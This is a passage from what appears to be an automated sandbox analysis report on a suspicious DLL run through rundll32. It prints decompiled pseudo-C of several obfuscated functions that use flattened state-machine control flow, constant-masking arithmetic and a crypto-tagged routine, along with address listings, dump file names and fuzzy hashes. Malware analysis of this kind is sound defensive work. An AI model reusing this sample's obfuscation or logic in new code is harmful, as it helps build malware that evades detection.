											_t362 = _t316 - 0xf7fe787;
											if(_t316 != 0xf7fe787) {
												goto L15;
											} else {
												_push(_v692);
												_push(_v676);
												_push(0x2b10cc);
												_t308 = E002BAB66(_v648, _v644, _t362);
												_t309 =  *0x2d520c; // 0x0
												_t311 =  *0x2d520c; // 0x0
												E002BE7CE(_t308, _t362, _v588, _t311 + 8, _v648, _v640, _v684, _v632, _v652, _t309 + 0x220);
												E002BAE03(_v656, _v624, _v612, _t308);
												_t352 = _t352 + 0x34;
												_t316 = 0x5ceff6a;
												continue;
											}
										}
									}
								}
							}
						}
						L18:
						return _t315;
					}
					_v572 = _v572 - E002B9A1E();
					_t316 = 0xf7fe787;
					asm("sbb [esp+0x94], edx");
					L15:
					__eflags = _t316 - 0x36ffdb;
				} while (__eflags != 0);
				goto L18;
			}





























































                                                                                                                      0x002cb397
                                                                                                                      0x002cb3a1
                                                                                                                      0x002cb3a5
                                                                                                                      0x002cb3aa
                                                                                                                      0x002cb3af
                                                                                                                      0x002cb3b4
                                                                                                                      0x002cb3bc
                                                                                                                      0x002cb3c4
                                                                                                                      0x002cb3d5
                                                                                                                      0x002cb3d9
                                                                                                                      0x002cb3db
                                                                                                                      0x002cb3e3
                                                                                                                      0x002cb3eb
                                                                                                                      0x002cb3fa
                                                                                                                      0x002cb3fd
                                                                                                                      0x002cb404
                                                                                                                      0x002cb40f
                                                                                                                      0x002cb417
                                                                                                                      0x002cb41c
                                                                                                                      0x002cb424
                                                                                                                      0x002cb42c
                                                                                                                      0x002cb43c
                                                                                                                      0x002cb440
                                                                                                                      0x002cb448
                                                                                                                      0x002cb450
                                                                                                                      0x002cb458
                                                                                                                      0x002cb460
                                                                                                                      0x002cb468
                                                                                                                      0x002cb470
                                                                                                                      0x002cb478
                                                                                                                      0x002cb480
                                                                                                                      0x002cb488
                                                                                                                      0x002cb494
                                                                                                                      0x002cb497
                                                                                                                      0x002cb49b
                                                                                                                      0x002cb4a3
                                                                                                                      0x002cb4ab
                                                                                                                      0x002cb4b3
                                                                                                                      0x002cb4c0
                                                                                                                      0x002cb4c4
                                                                                                                      0x002cb4cc
                                                                                                                      0x002cb4d4
                                                                                                                      0x002cb4d9
                                                                                                                      0x002cb4de
                                                                                                                      0x002cb4e6
                                                                                                                      0x002cb4ee
                                                                                                                      0x002cb4f9
                                                                                                                      0x002cb500
                                                                                                                      0x002cb50b
                                                                                                                      0x002cb513
                                                                                                                      0x002cb51d
                                                                                                                      0x002cb521
                                                                                                                      0x002cb529
                                                                                                                      0x002cb531
                                                                                                                      0x002cb536
                                                                                                                      0x002cb53b
                                                                                                                      0x002cb543
                                                                                                                      0x002cb54b
                                                                                                                      0x002cb558
                                                                                                                      0x002cb561
                                                                                                                      0x002cb565
                                                                                                                      0x002cb56d
                                                                                                                      0x002cb575
                                                                                                                      0x002cb57d
                                                                                                                      0x002cb587
                                                                                                                      0x002cb594
                                                                                                                      0x002cb59c
                                                                                                                      0x002cb5a4
                                                                                                                      0x002cb5ac
                                                                                                                      0x002cb5b4
                                                                                                                      0x002cb5bc
                                                                                                                      0x002cb5c0
                                                                                                                      0x002cb5c8
                                                                                                                      0x002cb5d0
                                                                                                                      0x002cb5d8
                                                                                                                      0x002cb5dd
                                                                                                                      0x002cb5e5
                                                                                                                      0x002cb5ed
                                                                                                                      0x002cb5f5
                                                                                                                      0x002cb5fd
                                                                                                                      0x002cb605
                                                                                                                      0x002cb60d
                                                                                                                      0x002cb621
                                                                                                                      0x002cb626
                                                                                                                      0x002cb62f
                                                                                                                      0x002cb63a
                                                                                                                      0x002cb645
                                                                                                                      0x002cb650
                                                                                                                      0x002cb65b
                                                                                                                      0x002cb663
                                                                                                                      0x002cb668
                                                                                                                      0x002cb670
                                                                                                                      0x002cb678
                                                                                                                      0x002cb680
                                                                                                                      0x002cb685
                                                                                                                      0x002cb68d
                                                                                                                      0x002cb695
                                                                                                                      0x002cb69d
                                                                                                                      0x002cb6a5
                                                                                                                      0x002cb6ad
                                                                                                                      0x002cb6b8
                                                                                                                      0x002cb6c3
                                                                                                                      0x002cb6ce
                                                                                                                      0x002cb6d6
                                                                                                                      0x002cb6db
                                                                                                                      0x002cb6e4
                                                                                                                      0x002cb6e9
                                                                                                                      0x002cb6ef
                                                                                                                      0x002cb6f7
                                                                                                                      0x002cb6ff
                                                                                                                      0x002cb707
                                                                                                                      0x002cb70f
                                                                                                                      0x002cb717
                                                                                                                      0x002cb71f
                                                                                                                      0x002cb727
                                                                                                                      0x002cb72f
                                                                                                                      0x002cb737
                                                                                                                      0x002cb73f
                                                                                                                      0x002cb744
                                                                                                                      0x002cb74c
                                                                                                                      0x002cb754
                                                                                                                      0x002cb75c
                                                                                                                      0x002cb764
                                                                                                                      0x002cb76c
                                                                                                                      0x002cb774
                                                                                                                      0x002cb780
                                                                                                                      0x002cb783
                                                                                                                      0x002cb787
                                                                                                                      0x002cb78b
                                                                                                                      0x002cb793
                                                                                                                      0x002cb793
                                                                                                                      0x002cb7a5
                                                                                                                      0x002cb95b
                                                                                                                      0x00000000
                                                                                                                      0x002cb7ab
                                                                                                                      0x002cb7ad
                                                                                                                      0x002cb94b
                                                                                                                      0x002cb951
                                                                                                                      0x00000000
                                                                                                                      0x002cb7b3
                                                                                                                      0x002cb7b9
                                                                                                                      0x002cb922
                                                                                                                      0x002cb927
                                                                                                                      0x002cb929
                                                                                                                      0x002cb92c
                                                                                                                      0x002cb92f
                                                                                                                      0x002cb931
                                                                                                                      0x00000000
                                                                                                                      0x002cb931
                                                                                                                      0x002cb7bf
                                                                                                                      0x002cb7c5
                                                                                                                      0x002cb99c
                                                                                                                      0x002cb7cb
                                                                                                                      0x002cb7d1
                                                                                                                      0x002cb861
                                                                                                                      0x002cb86a
                                                                                                                      0x002cb871
                                                                                                                      0x002cb878
                                                                                                                      0x002cb87f
                                                                                                                      0x002cb886
                                                                                                                      0x002cb895
                                                                                                                      0x002cb8a7
                                                                                                                      0x002cb8b5
                                                                                                                      0x002cb8c2
                                                                                                                      0x002cb8c9
                                                                                                                      0x002cb8d0
                                                                                                                      0x002cb8d7
                                                                                                                      0x002cb8db
                                                                                                                      0x002cb8dd
                                                                                                                      0x002cb8e0
                                                                                                                      0x00000000
                                                                                                                      0x002cb7d7
                                                                                                                      0x002cb7d7
                                                                                                                      0x002cb7dd
                                                                                                                      0x00000000
                                                                                                                      0x002cb7e3
                                                                                                                      0x002cb7e3
                                                                                                                      0x002cb7e7
                                                                                                                      0x002cb7f3
                                                                                                                      0x002cb7f8
                                                                                                                      0x002cb802
                                                                                                                      0x002cb81f
                                                                                                                      0x002cb837
                                                                                                                      0x002cb84f
                                                                                                                      0x002cb854
                                                                                                                      0x002cb857
                                                                                                                      0x00000000
                                                                                                                      0x002cb857
                                                                                                                      0x002cb7dd
                                                                                                                      0x002cb7d1
                                                                                                                      0x002cb7c5
                                                                                                                      0x002cb7b9
                                                                                                                      0x002cb7ad
                                                                                                                      0x002cb9a7
                                                                                                                      0x002cb9b0
                                                                                                                      0x002cb9b0
                                                                                                                      0x002cb967
                                                                                                                      0x002cb96e
                                                                                                                      0x002cb973
                                                                                                                      0x002cb97a
                                                                                                                      0x002cb97a
                                                                                                                      0x002cb97a
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: #?$8$V$aIg$qM
                                                                                                                      • API String ID: 0-1946175224
                                                                                                                      • Opcode ID: 57d27c489026f7624a49baa8de5ff50836fcd821a769eb49c2077c0a4aadb245
                                                                                                                      • Instruction ID: cceebdc97b08e481bc0296a6008507da6921cbb29eab3b82ea84f9991fc99928
                                                                                                                      • Opcode Fuzzy Hash: 57d27c489026f7624a49baa8de5ff50836fcd821a769eb49c2077c0a4aadb245
                                                                                                                      • Instruction Fuzzy Hash: E2E110714083809FD369CF65C48AA5BFBE1FBC4754F108A1DF6AA86260D7B58949CF43
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 002D0867 Relevance: 6.5, Strings: 5, Instructions: 256COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 97%
                                                                                                                      			E002D0867(intOrPtr __ecx, intOrPtr* __edx) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr* _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				intOrPtr _t261;
				intOrPtr* _t266;
				intOrPtr _t273;
				intOrPtr _t274;
				intOrPtr _t275;
				intOrPtr _t281;
				intOrPtr _t282;
				intOrPtr _t283;
				signed int _t307;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				signed int _t311;
				signed int _t312;
				signed int _t313;
				intOrPtr _t314;
				void* _t316;
				intOrPtr _t317;
				intOrPtr _t318;
				intOrPtr _t319;
				signed int* _t320;

				_t275 = __ecx;
				_t320 =  &_v116;
				_v12 = __edx;
				_v28 = __ecx;
				_v8 = 0x8dec59;
				_v4 = 0;
				_v84 = 0xe165d;
				_v84 = _v84 << 7;
				_v84 = _v84 + 0xc1b7;
				_v84 = _v84 ^ 0xc80f2461;
				_v84 = _v84 ^ 0xcf04d456;
				_v32 = 0x655f30;
				_v32 = _v32 + 0x312d;
				_v32 = _v32 ^ 0x0065b82f;
				_v56 = 0xcafed0;
				_v24 = 0;
				_t316 = 0x75256fb;
				_t307 = 0x74;
				_v56 = _v56 / _t307;
				_v56 = _v56 | 0x8b781090;
				_v56 = _v56 ^ 0x8b7ff779;
				_v96 = 0xabe325;
				_v96 = _v96 << 0xd;
				_v96 = _v96 ^ 0xcbcb3531;
				_v96 = _v96 | 0x09a083b5;
				_v96 = _v96 ^ 0xbfa5786a;
				_v76 = 0x7b9c0a;
				_t308 = 0x1c;
				_v76 = _v76 / _t308;
				_v76 = _v76 + 0xffff76d9;
				_v76 = _v76 ^ 0x00066890;
				_v80 = 0xfad268;
				_v80 = _v80 << 0x10;
				_v80 = _v80 ^ 0x68dc041b;
				_v80 = _v80 ^ 0xbab50c4e;
				_v112 = 0x5717c0;
				_v112 = _v112 + 0xd318;
				_v112 = _v112 + 0xffff9813;
				_v112 = _v112 ^ 0x80b72014;
				_v112 = _v112 ^ 0x80e33bd1;
				_v116 = 0x9f285d;
				_v116 = _v116 >> 9;
				_v116 = _v116 + 0xffff6359;
				_v116 = _v116 + 0x4b40;
				_v116 = _v116 ^ 0xfffb57cb;
				_v104 = 0x80a8a2;
				_t309 = 0x29;
				_v104 = _v104 * 0x2c;
				_v104 = _v104 | 0xf3fc02bd;
				_v104 = _v104 * 0x46;
				_v104 = _v104 ^ 0xcf237eb9;
				_v72 = 0x5bfbbd;
				_v72 = _v72 | 0xd3d7b19d;
				_v72 = _v72 << 0xe;
				_v72 = _v72 ^ 0xfee9d95e;
				_v108 = 0xd9b2ce;
				_v108 = _v108 << 0xf;
				_v108 = _v108 + 0xffff979e;
				_v108 = _v108 << 2;
				_v108 = _v108 ^ 0x6594627e;
				_v40 = 0xeed128;
				_v40 = _v40 * 0x34;
				_v40 = _v40 ^ 0x3088f647;
				_v68 = 0x4ae85e;
				_v68 = _v68 / _t309;
				_t310 = 0x35;
				_t319 = _v12;
				_v68 = _v68 * 0x53;
				_v68 = _v68 ^ 0x009a12ab;
				_v60 = 0xe58ccf;
				_v60 = _v60 / _t310;
				_v60 = _v60 >> 9;
				_v60 = _v60 ^ 0x00082ee6;
				_v100 = 0x896781;
				_v100 = _v100 ^ 0xb532ffdf;
				_t311 = 0x3d;
				_v100 = _v100 / _t311;
				_v100 = _v100 >> 0x10;
				_v100 = _v100 ^ 0x0003daf8;
				_v64 = 0xd8c0ce;
				_v64 = _v64 + 0xffffaca0;
				_v64 = _v64 << 0xc;
				_v64 = _v64 ^ 0x86dd78e3;
				_v36 = 0xf932ba;
				_t312 = 0x7f;
				_v36 = _v36 * 0x58;
				_v36 = _v36 ^ 0x55a76b7b;
				_v88 = 0x9f6659;
				_v88 = _v88 / _t312;
				_v88 = _v88 | 0x1ff6fbbf;
				_v88 = _v88 ^ 0xc9c88694;
				_v88 = _v88 ^ 0xd6316d06;
				_v48 = 0x252418;
				_v48 = _v48 ^ 0x008304c1;
				_v48 = _v48 + 0xffff4e21;
				_v48 = _v48 ^ 0x00a4a0c7;
				_v92 = 0xdb5076;
				_v92 = _v92 + 0xffff1b85;
				_v92 = _v92 | 0x2d9bcef8;
				_t313 = 0x68;
				_v92 = _v92 / _t313;
				_v92 = _v92 ^ 0x0076c4f2;
				_v52 = 0x242151;
				_v52 = _v52 | 0x94ee4ace;
				_v52 = _v52 + 0xf8ef;
				_v52 = _v52 ^ 0x94e81f3d;
				_t314 = _v4;
				_t274 = _v8;
				L1:
				while(1) {
					do {
						while(_t316 != 0x1075595) {
							if(_t316 == 0x75256fb) {
								_t316 = 0x1075595;
								continue;
							} else {
								if(_t316 != 0xe0f16ec) {
									goto L15;
								} else {
									_t281 = E002B840B(_v76,  &_v20, _v80, _t275, _v112, _t319, _v116, _t261);
									_t320 =  &(_t320[6]);
									_v24 = _t281;
									if(_t281 == 0) {
										_t317 = _v24;
										L20:
										E002B68DE(_v88, _v48, _v92, _v52, _t274);
									} else {
										_t282 = _v20;
										if(_t282 == 0) {
											goto L16;
										} else {
											_v44 = _v44 + _t282;
											_t319 = _t319 - _t282;
											if(_t319 != 0) {
												L9:
												_t261 = _v44;
												L10:
												_t275 = _v28;
												_t316 = 0xe0f16ec;
												continue;
											} else {
												_t283 = _t314 + _t314;
												_push(_t283);
												_push(_t283);
												_v16 = _t283;
												_t318 = E002C3512(_t283);
												if(_t318 == 0) {
													goto L16;
												} else {
													E002CFD29(_t274, _v40, _t318, _v68, _t314);
													E002B68DE(_v60, _v100, _v64, _v36, _t274);
													_t319 = _t314;
													_t273 = _t318 + _t314;
													_t314 = _v16;
													_t320 =  &(_t320[6]);
													_v44 = _t273;
													_t274 = _t318;
													if(_t319 == 0) {
														goto L16;
													} else {
														goto L9;
													}
												}
											}
										}
									}
								}
							}
							L18:
							return _t317;
						}
						_t314 = 0x10000;
						_push(_t275);
						_push(_t275);
						_t261 = E002C3512(0x10000);
						_t274 = _t261;
						if(_t274 == 0) {
							_t275 = _v28;
							_t316 = 0x6559491;
							goto L15;
						} else {
							_v44 = _t261;
							_t319 = 0x10000;
							goto L10;
						}
						goto L18;
						L15:
						_t261 = _v44;
					} while (_t316 != 0x6559491);
					L16:
					_t317 = _v24;
					if(_t317 == 0) {
						goto L20;
					} else {
						_t266 = _v12;
						 *_t266 = _t274;
						 *((intOrPtr*)(_t266 + 4)) = _t314 - _t319;
					}
					goto L18;
				}
			}





















































                                                                                                                      0x002d0867
                                                                                                                      0x002d0867
                                                                                                                      0x002d086e
                                                                                                                      0x002d0872
                                                                                                                      0x002d0876
                                                                                                                      0x002d0880
                                                                                                                      0x002d0887
                                                                                                                      0x002d088f
                                                                                                                      0x002d0894
                                                                                                                      0x002d089c
                                                                                                                      0x002d08a4
                                                                                                                      0x002d08ac
                                                                                                                      0x002d08b4
                                                                                                                      0x002d08bc
                                                                                                                      0x002d08c4
                                                                                                                      0x002d08cc
                                                                                                                      0x002d08d0
                                                                                                                      0x002d08dd
                                                                                                                      0x002d08e2
                                                                                                                      0x002d08e8
                                                                                                                      0x002d08f0
                                                                                                                      0x002d08f8
                                                                                                                      0x002d0900
                                                                                                                      0x002d0905
                                                                                                                      0x002d090d
                                                                                                                      0x002d0915
                                                                                                                      0x002d091d
                                                                                                                      0x002d0929
                                                                                                                      0x002d092e
                                                                                                                      0x002d0932
                                                                                                                      0x002d093a
                                                                                                                      0x002d0942
                                                                                                                      0x002d094a
                                                                                                                      0x002d094f
                                                                                                                      0x002d0957
                                                                                                                      0x002d095f
                                                                                                                      0x002d0967
                                                                                                                      0x002d096f
                                                                                                                      0x002d0977
                                                                                                                      0x002d097f
                                                                                                                      0x002d0987
                                                                                                                      0x002d098f
                                                                                                                      0x002d0994
                                                                                                                      0x002d099c
                                                                                                                      0x002d09a4
                                                                                                                      0x002d09ac
                                                                                                                      0x002d09b9
                                                                                                                      0x002d09ba
                                                                                                                      0x002d09be
                                                                                                                      0x002d09cb
                                                                                                                      0x002d09cf
                                                                                                                      0x002d09d7
                                                                                                                      0x002d09df
                                                                                                                      0x002d09e7
                                                                                                                      0x002d09ec
                                                                                                                      0x002d09f4
                                                                                                                      0x002d09fc
                                                                                                                      0x002d0a01
                                                                                                                      0x002d0a09
                                                                                                                      0x002d0a0e
                                                                                                                      0x002d0a16
                                                                                                                      0x002d0a23
                                                                                                                      0x002d0a27
                                                                                                                      0x002d0a31
                                                                                                                      0x002d0a41
                                                                                                                      0x002d0a4c
                                                                                                                      0x002d0a4f
                                                                                                                      0x002d0a53
                                                                                                                      0x002d0a57
                                                                                                                      0x002d0a5f
                                                                                                                      0x002d0a6f
                                                                                                                      0x002d0a73
                                                                                                                      0x002d0a78
                                                                                                                      0x002d0a80
                                                                                                                      0x002d0a88
                                                                                                                      0x002d0a94
                                                                                                                      0x002d0a99
                                                                                                                      0x002d0a9f
                                                                                                                      0x002d0aa4
                                                                                                                      0x002d0aac
                                                                                                                      0x002d0ab4
                                                                                                                      0x002d0abc
                                                                                                                      0x002d0ac1
                                                                                                                      0x002d0ac9
                                                                                                                      0x002d0ad6
                                                                                                                      0x002d0ad9
                                                                                                                      0x002d0add
                                                                                                                      0x002d0ae5
                                                                                                                      0x002d0af5
                                                                                                                      0x002d0af9
                                                                                                                      0x002d0b01
                                                                                                                      0x002d0b09
                                                                                                                      0x002d0b11
                                                                                                                      0x002d0b19
                                                                                                                      0x002d0b21
                                                                                                                      0x002d0b29
                                                                                                                      0x002d0b31
                                                                                                                      0x002d0b39
                                                                                                                      0x002d0b41
                                                                                                                      0x002d0b4d
                                                                                                                      0x002d0b50
                                                                                                                      0x002d0b54
                                                                                                                      0x002d0b60
                                                                                                                      0x002d0b68
                                                                                                                      0x002d0b70
                                                                                                                      0x002d0b78
                                                                                                                      0x002d0b80
                                                                                                                      0x002d0b87
                                                                                                                      0x00000000
                                                                                                                      0x002d0b8b
                                                                                                                      0x002d0b8b
                                                                                                                      0x002d0b8b
                                                                                                                      0x002d0b9d
                                                                                                                      0x002d0c68
                                                                                                                      0x00000000
                                                                                                                      0x002d0ba3
                                                                                                                      0x002d0ba9
                                                                                                                      0x00000000
                                                                                                                      0x002d0baf
                                                                                                                      0x002d0bcb
                                                                                                                      0x002d0bcd
                                                                                                                      0x002d0bd0
                                                                                                                      0x002d0bd6
                                                                                                                      0x002d0cd2
                                                                                                                      0x002d0cd6
                                                                                                                      0x002d0ce7
                                                                                                                      0x002d0bdc
                                                                                                                      0x002d0bdc
                                                                                                                      0x002d0be2
                                                                                                                      0x00000000
                                                                                                                      0x002d0be8
                                                                                                                      0x002d0be8
                                                                                                                      0x002d0bec
                                                                                                                      0x002d0bee
                                                                                                                      0x002d0c56
                                                                                                                      0x002d0c56
                                                                                                                      0x002d0c5a
                                                                                                                      0x002d0c5a
                                                                                                                      0x002d0c5e
                                                                                                                      0x00000000
                                                                                                                      0x002d0bf0
                                                                                                                      0x002d0bf4
                                                                                                                      0x002d0bff
                                                                                                                      0x002d0c00
                                                                                                                      0x002d0c01
                                                                                                                      0x002d0c0a
                                                                                                                      0x002d0c10
                                                                                                                      0x00000000
                                                                                                                      0x002d0c16
                                                                                                                      0x002d0c22
                                                                                                                      0x002d0c38
                                                                                                                      0x002d0c3d
                                                                                                                      0x002d0c3f
                                                                                                                      0x002d0c42
                                                                                                                      0x002d0c49
                                                                                                                      0x002d0c4c
                                                                                                                      0x002d0c50
                                                                                                                      0x002d0c54
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x002d0c54
                                                                                                                      0x002d0c10
                                                                                                                      0x002d0bee
                                                                                                                      0x002d0be2
                                                                                                                      0x002d0bd6
                                                                                                                      0x002d0ba9
                                                                                                                      0x002d0cc9
                                                                                                                      0x002d0cd1
                                                                                                                      0x002d0cd1
                                                                                                                      0x002d0c76
                                                                                                                      0x002d0c83
                                                                                                                      0x002d0c84
                                                                                                                      0x002d0c87
                                                                                                                      0x002d0c8c
                                                                                                                      0x002d0c92
                                                                                                                      0x002d0c9c
                                                                                                                      0x002d0ca0
                                                                                                                      0x00000000
                                                                                                                      0x002d0c94
                                                                                                                      0x002d0c94
                                                                                                                      0x002d0c98
                                                                                                                      0x00000000
                                                                                                                      0x002d0c98
                                                                                                                      0x00000000
                                                                                                                      0x002d0ca5
                                                                                                                      0x002d0ca5
                                                                                                                      0x002d0ca9
                                                                                                                      0x002d0cb5
                                                                                                                      0x002d0cb5
                                                                                                                      0x002d0cbb
                                                                                                                      0x00000000
                                                                                                                      0x002d0cbd
                                                                                                                      0x002d0cbd
                                                                                                                      0x002d0cc3
                                                                                                                      0x002d0cc5
                                                                                                                      0x002d0cc5
                                                                                                                      0x00000000
                                                                                                                      0x002d0cbb

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: -1$0_e$@K$Q!$$^J
                                                                                                                      • API String ID: 0-785566946
                                                                                                                      • Opcode ID: 41ea18c928f5bc6e050d69f8087d6909cd5aff65254f797b7e67a5a6cbd5e357
                                                                                                                      • Instruction ID: b85e557570856b0fa5498649cf7cf5c37a93aad5c889131ac774c6228c23f24a
                                                                                                                      • Opcode Fuzzy Hash: 41ea18c928f5bc6e050d69f8087d6909cd5aff65254f797b7e67a5a6cbd5e357
                                                                                                                      • Instruction Fuzzy Hash: D9C12FB15183819FC358CF69C48990BFBE1FBC5798F508A1EF5A696220D3B0D919CF82
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 002C0946 Relevance: 6.5, Strings: 5, Instructions: 215COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 99%
                                                                                                                      			E002C0946(void* __ecx, void* __edx) {
				signed int _v4;
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _t226;
				signed int _t228;
				void* _t231;
				signed int _t233;
				signed int _t234;
				signed int _t235;
				signed int _t236;
				signed int _t237;
				void* _t263;
				void* _t264;
				signed int _t265;
				signed int* _t267;
				signed int* _t268;

				_t267 =  &_v88;
				_v4 = _v4 & 0x00000000;
				_v8 = 0xb66c37;
				_v72 = 0xb73c2;
				_v72 = _v72 << 4;
				_v72 = _v72 | 0x07739320;
				_v72 = _v72 << 9;
				_v72 = _v72 ^ 0xef7952b0;
				_v28 = 0x2a4560;
				_v28 = _v28 + 0x8659;
				_v28 = _v28 ^ 0x002a9629;
				_v76 = 0x8c4def;
				_t263 = __edx;
				_t231 = __ecx;
				_t264 = 0xd46e588;
				_t233 = 0x74;
				_v76 = _v76 / _t233;
				_t234 = 0x6c;
				_v76 = _v76 * 3;
				_v76 = _v76 >> 5;
				_v76 = _v76 ^ 0x000c6890;
				_v80 = 0x921d05;
				_v80 = _v80 + 0xffff1131;
				_v80 = _v80 / _t234;
				_v80 = _v80 + 0xffff8087;
				_v80 = _v80 ^ 0x0007528b;
				_v20 = 0x474e9c;
				_t235 = 0xb;
				_v20 = _v20 * 0x25;
				_v20 = _v20 ^ 0x0a4b2981;
				_v44 = 0x41d7a6;
				_v44 = _v44 >> 4;
				_v44 = _v44 + 0xffffa7bd;
				_v44 = _v44 ^ 0x00093433;
				_v68 = 0x96e6ad;
				_v68 = _v68 * 0xe;
				_v68 = _v68 + 0x1201;
				_v68 = _v68 >> 9;
				_v68 = _v68 ^ 0x000fa369;
				_v24 = 0xe45c66;
				_t66 =  &_v24; // 0xe45c66
				_v24 =  *_t66 / _t235;
				_v24 = _v24 ^ 0x001eca74;
				_v12 = 0xe2325f;
				_v12 = _v12 >> 2;
				_v12 = _v12 ^ 0x003de0fa;
				_v40 = 0xdcdb46;
				_v40 = _v40 + 0xfb03;
				_v40 = _v40 + 0xffff4ab2;
				_v40 = _v40 ^ 0x00d010f5;
				_v16 = 0xf0578c;
				_t236 = 0x25;
				_v16 = _v16 * 0x2d;
				_v16 = _v16 ^ 0x2a381d62;
				_v60 = 0xf0efbe;
				_v60 = _v60 / _t236;
				_t265 = 0x18;
				_v60 = _v60 / _t265;
				_v60 = _v60 + 0xffffc994;
				_v60 = _v60 ^ 0x00051ba1;
				_v64 = 0xfb78a0;
				_v64 = _v64 << 9;
				_t237 = 0x41;
				_v64 = _v64 / _t237;
				_v64 = _v64 | 0xcaafab65;
				_v64 = _v64 ^ 0xcbeb608b;
				_v84 = 0xb70797;
				_v84 = _v84 ^ 0x7f243ece;
				_v84 = _v84 | 0x19416b2b;
				_v84 = _v84 ^ 0xcf7db733;
				_v84 = _v84 ^ 0xb0a40cc8;
				_v88 = 0xcdb2b9;
				_v88 = _v88 + 0x7ca0;
				_v88 = _v88 + 0xffff4266;
				_v88 = _v88 / _t265;
				_v88 = _v88 ^ 0x000ad15f;
				_v32 = 0x3f4742;
				_v32 = _v32 + 0xffff8438;
				_v32 = _v32 ^ 0x00328def;
				_v48 = 0xe7fa35;
				_v48 = _v48 | 0x5473134a;
				_v48 = _v48 + 0x6bf3;
				_v48 = _v48 ^ 0x54f160bb;
				_v36 = 0x82f06;
				_v36 = _v36 >> 1;
				_v36 = _v36 * 0x4f;
				_v36 = _v36 ^ 0x0140909c;
				_v52 = 0x77cd37;
				_v52 = _v52 << 0xb;
				_v52 = _v52 ^ 0x0f05aaad;
				_v52 = _v52 * 0x5b;
				_v52 = _v52 ^ 0x116d7cbe;
				_v56 = 0x6cb0a3;
				_v56 = _v56 + 0xab46;
				_v56 = _v56 >> 0x10;
				_v56 = _v56 + 0x7715;
				_v56 = _v56 ^ 0x0001d55a;
				do {
					while(_t264 != 0x8d90b87) {
						if(_t264 == 0x991fac7) {
							return E002BF88A(_v36, _v52, _v56,  *(_t263 + 0x30));
						}
						if(_t264 == 0xa3f1429) {
							_push(_t237);
							_t228 = E002C8D71(_v72, _v28, __eflags, _v76, _v80, _t231);
							_t268 =  &(_t267[4]);
							 *(_t263 + 0x30) = _t228;
							__eflags = _t228;
							if(_t228 != 0) {
								E002BEE05(_v44, _v68, _v24, _t228, _t228);
								_t237 =  *(_t263 + 0x30);
								E002CE713(_t237, _v12, _v40, _v16);
								_t267 =  &(_t268[6]);
								_t264 = 0x8d90b87;
								continue;
							}
						} else {
							if(_t264 == 0xd46e588) {
								_t264 = 0xa3f1429;
								continue;
							} else {
								if(_t264 != 0xf9322b8) {
									goto L14;
								} else {
									_t237 = E002B6ED6;
									_t228 = E002C4EFF(E002B6ED6, _v84, E002B6ED6, E002B6ED6, _v88, _v32, E002B6ED6, _v48, _t263);
									_t267 =  &(_t267[8]);
									 *(_t263 + 0x24) = _t228;
									if(_t228 == 0) {
										_t264 = 0x991fac7;
										continue;
									}
								}
							}
						}
						return _t228;
						L18:
					}
					_t237 = _v60;
					_t226 = E002C2BDE(_t237,  *(_t263 + 0x30), _v64);
					_t267 =  &(_t267[1]);
					 *(_t263 + 0xc) = _t226;
					__eflags = _t226;
					if(__eflags == 0) {
						_t264 = 0x991fac7;
						goto L14;
					} else {
						_t264 = 0xf9322b8;
						continue;
					}
					goto L18;
					L14:
					__eflags = _t264 - 0x74fce14;
				} while (__eflags != 0);
				return _t228;
			}






































                                                                                                                      0x002c0946
                                                                                                                      0x002c0949
                                                                                                                      0x002c094e
                                                                                                                      0x002c0956
                                                                                                                      0x002c095e
                                                                                                                      0x002c0963
                                                                                                                      0x002c096b
                                                                                                                      0x002c0970
                                                                                                                      0x002c0978
                                                                                                                      0x002c0980
                                                                                                                      0x002c0988
                                                                                                                      0x002c0990
                                                                                                                      0x002c09a0
                                                                                                                      0x002c09a2
                                                                                                                      0x002c09a8
                                                                                                                      0x002c09ad
                                                                                                                      0x002c09b2
                                                                                                                      0x002c09bd
